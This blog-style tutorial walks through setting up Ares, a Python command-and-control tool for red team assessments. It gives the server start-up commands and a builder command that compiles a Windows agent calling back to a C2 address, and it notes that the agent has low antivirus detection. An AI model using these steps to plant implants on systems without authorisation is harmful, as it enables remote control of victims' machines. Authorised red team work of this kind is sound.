The high demand of Red Team assessments has increased the interest of security companies and consultants to develop command and control tools with different capabilities. Some of these tools can be used and in official engagements while some others have been developed only for research purposes.
Ares is a command and control tool which is written in Python and it was developed by Kevin Locati. It has a web interface which runs on port 8080 and it is password and passphrase protected. The database must be created in advance of running the server.
./ares.py initdb ./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Once the password is set Ares will ask for a Passphrase to be used.
The main interface of Ares contains only three functions:
- Agent List
- Change Password
- Disconnect
The Agent List is the page of where all the infected hosts running the implant will appear.
The config.py in the agent folder controls the settings of the agent. Before anything else the SERVER variable must be changed to the IP address that the command and control server is running.
If wine is installed (Ares repository contains wine setup script) then the agent can be built in an executable format by running the following command:
./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe
Hosts that are running the agent will appear on the agent list in the following format.
Commands can be executed on the target hosts from a field and the output will be retrieved in a console window.
Ares except of some basic command execution on the target host doesn’t offer other capabilities. However the agent has at the time being low detection rate against a number of antivirus.
Leave a comment